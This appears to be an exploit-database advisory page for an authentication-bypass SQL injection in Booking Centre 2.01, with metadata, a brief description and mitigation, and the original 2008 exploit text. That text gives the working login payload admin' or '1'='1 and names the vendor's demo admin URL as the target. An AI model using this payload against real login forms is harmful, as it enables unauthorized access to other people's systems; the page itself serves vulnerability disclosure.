header-logo
Suggest Exploit
vendor:
Booking Centre
by:
MrDoug
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Booking Centre
Affected Version From: 02.01
Affected Version To: 02.01
Patch Exists: NO
Related CWE: N/A
CPE: a:hotelsadmin:booking_centre
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability

A vulnerability exists in Booking Centre 2.01 which allows an attacker to bypass authentication by entering the username as 'admin' or '1'='1' and any password. This allows the attacker to gain access to the application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability

--------------------------------------------------------------

Author: MrDoug
E-mail: mrdoug13[at]gmail[dot]com

--------------------------------------------------------------

Exploit: http://demo.hotelsadmin.com/admin/index.php

Username == admin' or '1'='1
password == (whatever)

--------------------------------------------------------------

Greetz to Slappywag

--------------------------------------------------------------

# milw0rm.com [2008-11-28]